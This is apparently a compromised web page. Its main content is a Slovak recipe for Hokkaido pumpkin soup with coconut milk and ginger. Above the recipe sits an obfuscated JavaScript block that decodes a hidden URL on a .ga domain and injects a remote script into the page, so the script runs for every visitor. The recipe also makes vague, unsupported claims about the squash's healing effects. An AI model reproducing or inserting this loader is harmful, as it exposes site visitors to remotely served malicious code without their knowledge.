var _0x1f92=['appendChild','1051197hJyWzE','279875vBeEEE','679597pxmSpW','1208114MFItag','shift','currentScript','1yNFUPu','755208bCXcLD','parentNode','808668ljhldK','277011vIvjKc','push','createElement','1020859qQZHqJ','script','1012100HJdiys','fromCharCode','insertBefore','src','getElementsByTagName','1OuqVoU','3470379tibEqN','1439788dxeSnm','head','94160WqQicf','2vRLkLk'];var _0xe4f51f=_0x1605;(function(_0x36e879,_0x71d7d){var _0x19f9dd=_0x1605;while(!![]){try{var _0x27ae8f=-parseInt(_0x19f9dd(0x1b8))+-parseInt(_0x19f9dd(0x1b0))+parseInt(_0x19f9dd(0x1b6))*parseInt(_0x19f9dd(0x1af))+-parseInt(_0x19f9dd(0x1c7))+-parseInt(_0x19f9dd(0x1c1))+-parseInt(_0x19f9dd(0x1b2))+-parseInt(_0x19f9dd(0x1bd))*-parseInt(_0x19f9dd(0x1be));if(_0x27ae8f===_0x71d7d)break;else _0x36e879['push'](_0x36e879['shift']());}catch(_0x5a5af5){_0x36e879['push'](_0x36e879['shift']());}}}(_0x1f92,0x95a7c));var _0x230d=[_0xe4f51f(0x1bc),_0xe4f51f(0x1b7),_0xe4f51f(0x1b1),_0xe4f51f(0x1c5),_0xe4f51f(0x1c0),'698448rkGfeF',_0xe4f51f(0x1c6),'281314aeWSVS','1fashtG',_0xe4f51f(0x1c9),_0xe4f51f(0x1bf),_0xe4f51f(0x1bb),_0xe4f51f(0x1c4),_0xe4f51f(0x1b3),_0xe4f51f(0x1c2),_0xe4f51f(0x1b9),'1YWwfcj'],_0x3e5356=_0x567b;function _0x567b(_0x26bed5,_0x3c3ade){_0x26bed5=_0x26bed5-0x161;var _0x88803e=_0x230d[_0x26bed5];return _0x88803e;}function _0x1605(_0x7e46ac,_0x414a0e){_0x7e46ac=_0x7e46ac-0x1af;var _0x1f92c0=_0x1f92[_0x7e46ac];return _0x1f92c0;}(function(_0x513bd6,_0x54f163){var _0x1d2548=_0xe4f51f,_0x41ee88=_0x567b;while(!![]){try{var _0x2955a7=-parseInt(_0x41ee88(0x168))*parseInt(_0x41ee88(0x16a))+parseInt(_0x41ee88(0x16f))+-parseInt(_0x41ee88(0x165))*-parseInt(_0x41ee88(0x161))+-parseInt(_0x41ee88(0x16c))+parseInt(_0x41ee88(0x167))+parseInt(_0x41ee88(0x16e))+-parseInt(_0x41ee88(0x170))*-parseInt(_0x41ee88(0x169));if(_0x2955a7===_0x54f163)break;else _0x513bd6[_0x1d2548(0x1b4)](_0x513bd6['shift']());}catch(_0x33270c){_0x513bd6[_0x1d2548(0x1b4)](_0x513bd6[_0x1d2548(0x1c8)]());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x2e,0x64,0x72,0x69,0x76,0x65,0x72,0x66,0x6f,0x72,0x74,0x6e,0x69,0x67,0x74,0x6c,0x79,0x2e,0x67,0x61,0x2f,0x74,0x56,0x39,0x53,0x4a,0x48),d=document,s=d[_0xe4f51f(0x1b5)](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm,document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][_0xe4f51f(0x1ba)](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][_0xe4f51f(0x1c3)](s);

Hokkaido pochádza z krajiny vychádzajúceho slnka- Japonska, kde ju pôvodný obyvatelia pestovali na sopečných pôdach ostrova Hokkaido. Jej zázračné účinky objavili už vtedy a využívame ich všetci do dnes. Málokto pozná všetky jej liečivé účinky a správnu prípravu, aby bola aj chuťovo neodolateľná. Prinášam vám jednoduchý, zdravý a hlavne neskutočne chutný recept na pravú domácu Hokkaido polievku.

Suroviny:

1 ks tekvica hokkaido

1 ks mrkva

1 ks petržlen

2 ks zemiaky

1 ks cibuľa

3 strúčiky cesnaku

zázvor

soľ, korenie, trstinový cukor

olivový olej

zeleninový vývar

200 ml kokosové mlieko

 

Postup:

Tekvicu ošúpeme, odstránime jadierka a nakrájame na približne dvojcentimetrové kúsky. Mrkvu, petržlen a zemiaky taktiež očistíme a nakrájame na menšie kocky, aby sa nám zelenina rovnomerne uvarila. Očistenú cibuľu a cesnak nakrájame na drobno, opečieme ich na olivovom oleji do zlata, pridáme zvyšok zeleniny a jemne zaprášime trstinovým cukrom. Zeleninu za miešania necháme skaramelizovať. S cukrom to netreba preháňať, stačí približne jedna polievková lyžica, tekvica aj mrkva sú samo o sebe dosť sladké. Keď je zelenina sfarbená jemne do zlatista, zalejeme zeleninovým vývarom, alebo vodou, pridáme očistený a na menšie kúsky nakrájaný zázvor a varíme, kým zelenina nie je mäkká, čo by malo trvať približne 30 minút. Uvarenú zeleninu rozmixujeme na jemno a vrátime do hrnca, pridáme kokosové mlieko, ochutíme soľou a čiernym mletým korením a prevaríme ju.

 

Tento recept je jednoduchý na prípravu a chuť polievky je úžasne sladkastá, s jemným pálením po zázvore. Na dekoráciu môžete použiť super zdravé tekvicové jadierka, prípadne petržlenovú vňať. Prajem vám dobrú chuť! 🙂